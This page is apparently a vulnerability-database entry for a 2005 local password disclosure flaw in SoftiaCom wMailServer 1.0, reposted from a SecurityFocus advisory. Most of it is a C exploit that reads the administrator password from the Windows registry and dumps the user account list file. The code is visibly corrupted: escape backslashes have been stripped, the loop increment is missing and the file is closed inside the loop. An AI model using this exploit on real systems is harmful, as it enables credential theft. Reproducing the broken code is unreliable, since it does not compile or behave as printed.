SoftiaCom wMailServer 1.0 – Local Information Disclosure
漏洞ID | 1055241 | 漏洞类型 | |
发布时间 | 2005-07-09 | 更新时间 | 2005-07-09 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Windows | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/14212/info
SoftiaCom WMailserver is prone to a local information disclosure vulnerability. The application stores passwords in the windows registry.
A local attacker may exploit this issue to disclose potentially sensitive information.
/***********************************
# Vulnerability: Local Password Disclosure
# Discovered on: July 9, 2005
# Discovered & Coded by: fRoGGz - SecuBox Labs
# Severity: Normal
**************************************/
#include <windows.h>
#include <stdio.h>
#define BUF 100
LONG lRet;
HKEY hKey;
DWORD dwBuf=BUF;
char pwd[BUF], fichier[BUF], donnees[BUF];
int main()
{
if( RegOpenKeyEx( HKEY_CURRENT_CONFIG,"Software\Darsite\MAILSRV\Admin",0,KEY_QUERY_VALUE,&hKey) !=ERROR_SUCCESS )
{
fprintf( stdout, "Aucune clef wMailServer en vue !n" );
return -1;
}
if( RegQueryValueEx( hKey,"",NULL,NULL,(BYTE *)&pwd,&dwBuf) != ERROR_SUCCESS )
lstrcpy( pwd,"Viden" );
fprintf( stdout, "nn-------------------------------------------n" );
fprintf( stdout, "SoftiaCom Software - wMailServer v1.0n" );
fprintf( stdout, "Local Password Disclosure Vulnerabilitynn" );
fprintf( stdout, "Discovered & coded by fRoGGz - SecuBox Labsnn" );
fprintf( stdout, "-------------------------------------------nn" );
fprintf( stdout, "Mot de passe Administrateurt: %sn", pwd );
int i;
FILE *fp;
char ch[100];
strcpy(fichier,"\WINNT\MAILSRV\userlist");
if((fp=fopen(fichier,"rb")) == NULL)
{
printf("Pas cool !n");
return -1;
}
for(i=0;i<99;i )
{
ch[i]=getc(fp);
strcpy(donnees,ch);
fclose(fp);
}
fprintf( stdout, "nListe des comptes utilisateursnn %sn", donnees );
return 0;
}
相关推荐: Solaris xlock Heap Overflow Vulnerability
Solaris xlock Heap Overflow Vulnerability 漏洞ID 1103013 漏洞类型 Boundary Condition Error 发布时间 2001-08-10 更新时间 2001-08-10 CVE编号 N/A CNN…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666